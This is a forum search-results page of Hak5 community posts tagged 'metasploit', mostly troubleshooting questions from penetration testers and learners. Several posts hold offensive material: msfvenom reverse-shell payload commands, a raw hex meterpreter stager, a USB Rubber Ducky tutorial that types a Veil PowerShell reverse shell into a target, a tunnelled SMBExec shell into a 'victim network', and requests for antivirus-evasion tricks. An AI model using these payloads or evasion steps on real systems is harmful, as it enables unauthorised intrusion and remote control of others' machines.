Jump to content

Search the Community

Showing results for tags 'metasploit'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL







Enter a five letter word.

  1. I was a little curious about the PrependMigrate option for meterpreter. I was trying to migrate to iexplore.exe or MicrosoftEdge.exe. But I'm not sure how to set the PrependMigrateProc option when generating my payload. I'm mostly confused on the path for the program I want to migrate to. If I use the program name it just doesn't work. When I use the full path it throws a different error like my syntax is wrong. Any ideas? msfvenom -p windows/meterpreter/reverse_hop_http -e x86/shikata_ga_nai -i 3 PrependMigrate true PrependMigrateProc "C:\Program Files\Internet Explorer\iexplore.exe" --platform win HOPURL= EXTENSIONS=stdapi,priv -f raw -o /root/Desktop/radpayload.raw
  2. Hi, I've been trying to upload a .vbs file to a remote machine in a meterpreter session without success. This problem also occurs with .exe files so it's not the .vbs file type not being supported. I've tried this: upload root/Desktop/program.vbs c:\\Users\\i7479\\Desktop This returns: [-] Error running command upload: Errno:ENOENT No such file or directory @ rb__file_s__stat - root/Desktop/program.vbs The paths for these files are both correct, it just can't find the program to be uploaded... Does anyone know how to carry this out? Should such a basic command be so tricky to execute? This doesn't work on Armitage (GUI) either btw...
  3. Hello, I'm having some troubles while trying to export some OSX payload for testing purpose using msfvenom and the -o flag. Here is what I enter: sudo msfvenom -a x86 --platform OSX -p osx/x86/isight/bind_tcp -b "\x00" -f elf -o someNameHere I'm working on Captain's OSX and whenever I open a 'free' access folder (Documents folder i.e.), msfvenom return me
  4. Hello , I am new to this forum but I think you guys can help me. I am having trouble with metasploit over the intenet . I have a backdoor with lhost: external ip and lport: 4444 My listener is just multi/handler with lhost: local ip and lport: 4444 I portforwarded the port 4444 on my router to my local ip . To make my backdoor I use veil. Hop you can help me !!!
  5. Hello, Does anyone have used port scanners like nmap, or vulnerability scaners like nessus, openvas, etc. while providing internet via computer? I'm using the nano on Ubuntu 14.04 using wp6.sh. I've succesfully deauthed some clients (i'm still learning so it's not perfect) and bumped them to connect to the pineapple but when i try to use any scanner using the pineapple's ip, the results are as if i was scanning a host that's not connected. So, nmap shows "scanned X ips, 0 hosts where up", nessus and openvas finish the task with zero results and metasploit can't complete any exploits because the host is down. I know that the os gets the pineapple as another interface but i don't think that's the problem because other times i've succesfully scanned hosts while connected to three different networks (using ethernet, wifi with the integrated card and wifi with an external card). I don't know if its because of the way the wps6.sh script works, because tbh i dont know how it works, but that's the problem i'm facing right now. Anyone that can help me? if you need any other data, please ask. thanks.
  6. I am experiencing a slight problem. I used to use Kali Linux 1.1.0 and it was running very well. So I chose to update to Kali Linux 2.0.0. since my update to Kali 2.0.0 my Metasploit cannot establish a connection through the HTTPS Payload. The connection will be accepted and will open but my PC will say "Session is not valid and will be closed" if the connection gets established and stays open - (it sometimes works..) then my commands will not be executed. I have already created a new payload with mfsvenom and it doesn't solve my problem. Do you have any suggestions or experiences with this problem; and if yes can you please help me fix it.
  7. I am trying to exploit the common joomla CMS application. Here is some info on the exploit. https://www.rapid7.com/db/modules/exploit/multi/http/joomla_http_header_rce To use the exploit in msfconsole type : use exploit/multi/http/joomla_http_header_rce So here comes my question. In the options for the exploit comes my problem show options ​###output below### Name Current Setting Required Description ---- --------------- -------- ----------- HEADER USER-AGENT yes The header to use for exploitation (Accepted: USER-AGENT, X-FORWARDED-FOR) Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST yes The target address RPORT 80 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The base path to the Joomla application VHOST no HTTP server virtual host My problem is the VHOST setting.I do under stand what virtual host is( I think it is when one ip is used to host multiple domain names) Imagine this scenario: target website running joomla is http://www.joomla-target.com/joomla/ on port 80 domain is hosted on but is not the same as http://www.joomla-target.com:80 (<--my virtual host understanding) I hope you have understood the scenario: So what will be the options for RHOST TARGETURI VHOST RPORT Please help. Thanks in advance.
  8. I am a kind of a noob on this one. I have this question. I share internet through tethering using my phone which is connected through the internet through the 3G network. I dont have any other way of accessing the internet, so no cable or wired connections. In the options for setting up an exploit in metasploit the LHOST option will not work if I set my public ip. This is because my ISP filters all incoming requests on all ports (The router is located at their site, no access).I would like to know if their is a way I could work around this, prefarably a free method.I already know I can use a VPS (Virtual Private Server) but thats expensive. Possible noobie solutions:proxies,VPNs.If this is a solution I would like to know how to setup the LPORT and LHOST. I am sorry if this has a simple answer. Environment: Kali linux version on VMware workstation--->Hosted on a windows machine Please help
  9. I've been seeking online for a complete tutorial that goes from finding if a computer is vulnerable to an exploit to getting a meterpreter session without the use of trojans. The things that are missing are... 1.the exact procedure of scanning a pc to find if it is vulnerable (and if it is possible a pc outside a local network and how is it possible to scan individual compuiters that are behind routers?) 2. Importing a new exploit that isnt already inside the metasploit framework. 3. setting a backdoor without the use of the persistance command of the meterpreter. 4. the procedure of the triggering of the exploit on the victim machine (what happens exactly?) any kind of info is apreciated.
  10. guys, I ve made a payload with SET that isnt detectable by windows defender, I can perfectly get a meterpreter session without beign detected, anyway i can do most of the actions that are possible in meterpterer , but when I run the persistence command , Windows Defender gives a report of a trojan Swrort.A . some info Victim pc is running windows 10 64-bit I am attacking localy the attacker is kali sana 2.0 So the question is how can I avoid detection?
  11. So once upon a time I bought a Butterfly Labs 600 GH/S miner. I was thinking, Is there a way I can use all that number crunching power to crack hashes or even to brute force?
  12. I was having firewall issues. I remembered seeing problem like this addressed in a segment of Metasploit Minute I wanted to try windows/meterpreter/reverse_hop_http I set the payload to talk to hop.php that I installed on my local machine. That part I'm pretty sure works. I'm not sure what options I didn't set right for the handler but it's wanting to stage to example.com rather than the IP I set. I know I'm missing an option but I'm not sure where to set it. Edit: No idea what I was thinking there. use exploit/multi/handler set HOPURL set payload windows/meterpreter/reverse_hop_http exploit -j Second try. Nailed it.
  13. Does anyone know a good way to change the signature of the metasploit "adobe_pdf_embedded_exe_nojs" exploit to get it past antivirus? I'm trying to copy the exploited PDF onto my test PC but the AV blocks it (BLOODHOUND.PDF.24). I can successfully avoid the AV with a venom tweaked reverse_tcp EXE, but can't figure out how to do the same with a PDF. (I can't even find the code for the exploit - I would expect it in the exploits\CVE2010-1240 folder) I'm using my tweaked reverse_tcp as the exe in the pdf. The exe gets past the AV without any problems. So the problem must be with the adobe_pdf_embedded... exploit. Has anyone managed to do this? Any advice or better ideas? I'm not fussed about the actual exploitation of the PC at this stage. I trying to learn how to dodge the antivirus.
  14. I don't really understand assembly code but I'm trying to learn it. I was curious is there a way to dump any old binary into a format that I can deliver via metasploit. I haven't really looked at the mechanics of payload delivery but I'm assuming payloads are delivered in a format like this: fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d686e6574006877696e6954684c772607ffd531db5353535353683a5679a7ffd553536a03535368901f0000e8080100002f586f525f762d445a35485978345444675a37325779417636395562494b706a42506338623968496e516e7861374c515566425465567a4557415a776150506d6d4f6f316c58626e70436573454e67433939596d364853424c335058754a4f3468714c477374656f4468696c79784d53687557393363534346754e622d4249696b38756d00506857899fc6ffd589c653680032e08453535357535668eb552e3bffd5966a0a5f688033000089e06a04506a1f566875469e86ffd55353535356682d06187bffd585c075084f75d9e84a0000006a4068001000006800004000536858a453e5ffd593535389e7576800200000535668129689e2ffd585c074cf8b0701c385c075e558c35fe877ffffff3139322e3136382e302e31383400bbf0b5a2566a0053ffd5 I suppose my question is: How do I go from a binary to this hex format. Is there an easy way to dump the binary into a ready to use assembly instruction set? If so what are the steps? If there's not an easy mode way to do this hypothetically what are the steps. Is it as simple as dumping the bytes into an array and outputing them that way. Can I take the output of objdump, hexdump, or xxd and create this usable byte array or string or whatever. I'm just really not sure where to start.
  15. hi I got a problem with metasploit [-] Failed to connect to the database: PG::InsufficientPrivilege: ERROR: permission denied for relation workspaces : SELECT "workspaces".* FROM "workspaces" WHERE "workspaces"."name" = 'default' ORDER BY "workspaces"."id" ASC LIMIT 1 how can i fix this please
  16. I've been exploring some client side attacks lately. What are some good references on client side exploitation? Stuff I've been reading up on lately: Social Engineering Toolkit, Metasploit payloads, Stegosploit. exploit kits, phishing. Always looking for more dirty tricks. If you know of a good client side sucker punch. Books, websites etc.
  17. Hello , I cant make a backdoor that works with a dns , I want to use Veil to bypass the AV but it does not work . What I use in Veil : - I use python/shellcode_inject/base64_substitution - For payload windows/meterpreter/reverse_tcp_dns Veil asks me 2 times for a lhost . What I use in Metasploit : - multi/handler - payload is windows/meterpreter/reverse_tcp_dns - lhost is my local ip - lport is my port It works witout a dns. Please help .
  18. Hello , I cant make a backdoor that works with a dns , I want to use Veil to bypass the AV but it does not work . What I use in Veil : - I use python/shellcode_inject/base64_substitution - For payload windows/meterpreter/reverse_tcp_dns Veil asks me 2 times for a lhost . What I use in Metasploit : - multi/handler - payload is windows/meterpreter/reverse_tcp_dns - lhost is my local ip - lport is my port It works witout a dns. Please help .
  19. Hi all! Just wanted to share something that might help other Lan Turtlers out there. One of the things I wanted to do with my lan turtle was to pivot my tools from my local box through the turtle. One such way is to use proxychains to proxy your local tools through your VPS in the cloud, and out through your turtle. My setup: [Local Kali box] --> (Router) --> [VPS] --> [turtle, which is inside victim network] I ran into trouble trying to figure out how to setup an SSH proxychain to it...found this article which worked right away: https://superuser.com/questions/332850/ssh-as-socks-proxy-through-multiple-hosts I used the first line, which was this command: ssh -f -N -D $PORT -oProxyCommand="ssh -W %h:%p machine-b" machine-c Here, machine-b would be the username@ip_of_VPS_in_cloud and machine-c would be the turtle, which should be root@localhost -p 2222 By replacing the "$PORT" with whatever you want (I used 9050, the default in the proxychains.conf), it would work flawlessly. Basically, what we are doing here is creating a Socks Proxy through SSH that goes through our VPS in the cloud, and then logs into the turtle (which already connects back to that VPS, through AutoSSH). With this tunnel, all you need to do is open up your proxychains.conf (/etc/proxychains.conf) and edit the last line to reflect the port you used. After that, you are all set! In Kali, just prepend "proxychains" before the tool you want to use.....for example! I wanted to be able to use Veil-Pillage from my local Kali box to get a SMBExec shell (because I already had credentials). So, by setting up the tunnel above, I ran root@kali#proxychains ./Veil-Pillage Which would take me to dialogue screen, I chose number 25, set my target (which was, a win7 VM) and my creds, and just hit ran! Veil-Pillage: post-explotation framework | [Version]: 1.1.2 ========================================================================= [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ========================================================================= [*] Executing module: Smbexec Shell... [*] Type 'exit' to exit the shell Trying protocol 445/SMB... Creating service SystemDiag... |S-chain|-<>-***.***.***.***-<><>-<><>-OK [!] Launching semi-interactive shell - Careful what you execute C:\Windows\system32> And there you have it!! I thought this should be useful for everyone out there. Another way of doing it is to use your metasploit/armitage instance in the VPS, use the meterpreter module, setup the Socks4 proxy, and then setup proxychains to reflect your VPS instance. Don't forget to add route! Let me know your thoughts! TL;DR: SSH socks proxy -- root@kali#ssh -f -N -D $PORT -oProxyCommand="ssh -W %h:%p VPS-in-cloud" turtle-in-VPS then change proxychains.conf, then "proxychains tool"
  20. I am completely unable to install exploits of my own or those downloaded from https://www.exploit-db.com in metasploit and went through the instructions set in this link:https://github.com/rapid7/metasploit-framework/wiki/Loading-External-Modules and all I get after i reload the modules in metasploit is "Failed to load module:........" I have entered in all of the correct file names and locations, and i just cannot think of anything else that could cure this solution. I have even tried copying the files to the parallel spot in the metasploit-framework file, I have tried everything I can possible think of. In short, the msfconsole will not recognize the new module path that I have created through the exploits folder in the .msf4 file, no matter what I try. I have tried reloading the modules, updating the msfconsole, etc. and whenever I tell the msfconsole to show me the new module path all I receive is an Invalid Parameter response and the number of exploits remains the same as if I had never created the new module path. Am I missing any steps to install exploits into metasploit??
  21. Anybody good at this? I tried to open a VNC session via metasploit and I get this popup with a bunch of steps. I'm not sure I'm following correctly. Is the payload I want to use: windows/vncinject/bind_tcp ? Is there a good walkthrough for setting up the VNC?
  22. Below are instructions for using Veil-Evasion to produce a Windows Powershell payload for a Meterpeter reverse TCP connection and injecting it using a USB Rubber Ducky. This is my first tutorial post, so if my formatting is a bit off... too bad ;) This method has a few benefits over the method provided using the "Simple-Ducky" program. It is injected completely through text input typed in by the Ducky into the Windows Command Shell It does not require the target computer to download a compiled file from a web server to set up the connection. You do not have to host a web server for the payload. (Less open ports on your machine, always a good thing.) Virus scanners are (hopefully) not going to pick this up because it is being entered directly into the Command Shell by Ducky. The flip side is that this is a larger payload for Ducky to type out so you will have to plan accordingly. Initial Setup (If you are running Kali, BlackBox, Backtrack, etc. you are probably almost set up already.) Install and setup Metasploit if you have not already. Install and setup Veil-Evasion (Homepage is here). Veil-Evasion is now available in the Kali repository. Use: apt-get install veil-evasion -y Note on initial install: You need to run veil-evasion after it is loaded by apt-get to set everything up. It says you don't have to run it as root, but you need to run it as root! Setup can take a bit. Set up Ducky Encoder or whatever you choose to use to make your inject.bin. Payload Generation Start veil-evasion. Type "list" to see the list of available payloads. Enter the number for the "powershell/meterpreter/rev_tcp" payload. (Was 22 for me.) Set you LHOST and LPORT the same as you would do setting up a payload in Metasploit. Type "generate". Enter the name you want for the payload. Veil will generate the payload in a .bat file in the "Veil-Output" directory under "source". (Most likely in the /usr/share/ directory.) Veil will also generate a Metasploit resource file for setting up a listener that you can use if you want. However, if you are behind a NAT router you will need to plan accordingly. Find and open the .bat file in the text editor of your choice and copy off the first section of the file as follows: powershell.exe -Nop.....ReadToEnd();" (The first .ReadToEnd() and don't miss the quotation mark at the end, you will need that.) If your target is a 64 bit machine you will need to add "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\" prior to the powershell.exe in order for your payload to work. Set up your Ducky script as you like to account for driver install, etc. Have it open a standard command shell and copy and paste the text you cut out above into the Ducky script as a STRING: Create you inject.bin file and put it on your Ducky.Operation Start a windows/meterpreter/reverse_tcp listener in Metasploit on your machine. (32 bit, not the x64 payload) Plug the Ducky into your target machine and away you go. The Command Shell window will automatically close once the Powershell script begins to execute. You may need to migrate to another x86 process to get full Meterpreter functions. A few notes If you try to run this sever times in quick succession on a target machine the subsequent tries may not go through as Powershell likes to hang on for a bit. Killing the initial process after migrating might fix this. I've tested this on the following:Windows 7 Pro x64 (physical machine with a physical network, through a restrictive firewall... Reverse connections rock!) Windows 8.1 Pro x64 - Virtual Windows 10 Pro x64 Technical Preview - Virtual Windows Server 2008 R2 - Virtual Windows Server 2012 R2 - Virtual Enjoy.
  23. AleV

    Metasploit on VM

    I am running Kali Linux in VMWare on my Ubuntu laptop. I am trying to practice with metasploit within it. The problem is, when I run msfconsole within the terminal, I get the following: :~# msfconsole DEPRECATION WARNING: Support for Rails < 4.1.0 will be dropped. (called from <top (required)> at /opt/metasploit/apps/pro/ui/lib/metasploit/pro/ui.rb:16) /opt/metasploit/apps/pro/vendor/bundle/ruby/2.1.0/gems/wicked-0.5.0/app/controllers/wicked/wizard_controller.rb:5:in `<top (required)>': uninitialized constant ApplicationController (NameError) from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.1.0/gems/railties-4.0.13/lib/rails/engine.rb:465:in `block (2 levels) in eager_load!' from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.1.0/gems/railties-4.0.13/lib/rails/engine.rb:464:in `each' from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.1.0/gems/railties-4.0.13/lib/rails/engine.rb:464:in `block in eager_load!' from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.1.0/gems/railties-4.0.13/lib/rails/engine.rb:462:in `each' from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.1.0/gems/railties-4.0.13/lib/rails/engine.rb:462:in `eager_load!' from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.1.0/gems/railties-4.0.13/lib/rails/engine.rb:347:in `eager_load!' from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.1.0/gems/railties-4.0.13/lib/rails/application/finisher.rb:56:in `each' from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.1.0/gems/railties-4.0.13/lib/rails/application/finisher.rb:56:in `block in <module:Finisher>' from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.1.0/gems/railties-4.0.13/lib/rails/initializable.rb:30:in `instance_exec' from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.1.0/gems/railties-4.0.13/lib/rails/initializable.rb:30:in `run' from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.1.0/gems/railties-4.0.13/lib/rails/initializable.rb:55:in `block in run_initializers' from /opt/metasploit/ruby/lib/ruby/2.1.0/tsort.rb:226:in `block in tsort_each' from /opt/metasploit/ruby/lib/ruby/2.1.0/tsort.rb:348:in `block (2 levels) in each_strongly_connected_component' from /opt/metasploit/ruby/lib/ruby/2.1.0/tsort.rb:427:in `each_strongly_connected_component_from' from /opt/metasploit/ruby/lib/ruby/2.1.0/tsort.rb:347:in `block in each_strongly_connected_component' from /opt/metasploit/ruby/lib/ruby/2.1.0/tsort.rb:345:in `each' from /opt/metasploit/ruby/lib/ruby/2.1.0/tsort.rb:345:in `call' from /opt/metasploit/ruby/lib/ruby/2.1.0/tsort.rb:345:in `each_strongly_connected_component' from /opt/metasploit/ruby/lib/ruby/2.1.0/tsort.rb:224:in `tsort_each' from /opt/metasploit/ruby/lib/ruby/2.1.0/tsort.rb:205:in `tsort_each' from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.1.0/gems/railties-4.0.13/lib/rails/initializable.rb:54:in `run_initializers' from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.1.0/gems/railties-4.0.13/lib/rails/application.rb:215:in `initialize!' from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.1.0/gems/railties-4.0.13/lib/rails/railtie/configurable.rb:30:in `method_missing' from /usr/share/metasploit-framework/config/environment.rb:5:in `<top (required)>' from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.1.0/gems/polyglot-0.3.5/lib/polyglot.rb:65:in `require' from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.1.0/gems/polyglot-0.3.5/lib/polyglot.rb:65:in `require' from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.1.0/gems/railties-4.0.13/lib/rails/application.rb:189:in `require_environment!' from /usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:63:in `require_environment!' from /usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:81:in `start' from /opt/metasploit/apps/pro/msf3/msfconsole:48:in `<main>' I have checked the Rails version within the VM: :~# rails -v Rails 4.2.2 I have updated severally. Where am I going wrong forum? Thank you for your guidance in advance
  24. Hello, First off I would like to say hi hak5 forums, love the show and couldnt register with kali's forum so i came here because I would like to educate myself, or be educated by others on some aspects of metasploit/kali To put it in the simplest terms, I was creating a payload for android, and I was wondering, how do i know what LPORT to use. for my first try i tried 446 with the following command : msfconsole android/meterpreter/reverse_tcp LHOST=<my.ip.adress> LPORT=446 R > hack.apk and it returned an error that i cant specify exactly(because i dont remember) but to paraphrase it was something along the lines of : invalid LPORT option than i switched it too msfconsole android/meterpreter/reverse_tcp LHOST=<my.ip.adress> LPORT=443 R > hack.apk and for some reason that i cant understand port 443 worked. so back to my question.... How do i know what LPORT to use when creating a payload? msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection> - See more at: http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.sDSTQbRg.dpuf msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection> - See more at: http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.sDSTQbRg.dpuf
  25. Hi guys, I am writing a graduation work at the university. Here is the main idea: I need to write a programm that will alow me to do attack modelling for IDS testing. So, let's suppose, I know target OS, open ports and running services (by running nmap, for exaple). Now I'd like to filter exploits (by ports, OS, etc) from Metasploit, that I might use. But I don't know how to do this. Can I make a request to postgresql DB, or exploits don't store there? Or should I use msfconsole instead? I need to write a programm, that would do this automatically taking as input Nmap scan result. For example, in Armitage there is a function Find Atacks. It does what I want, but I need to write something similar by myself. Next step is splitting these exploits by groups and building an attack tree or attack scenarios. After that the programm should run exploits and define, whether they were successfull or not. So, please, help me, if you know answer to one of my quistions. Maybe there is some API for Metasploit, for example for C or Java, it would be much easier to write such programm. Thanks a lot.
  • Create New...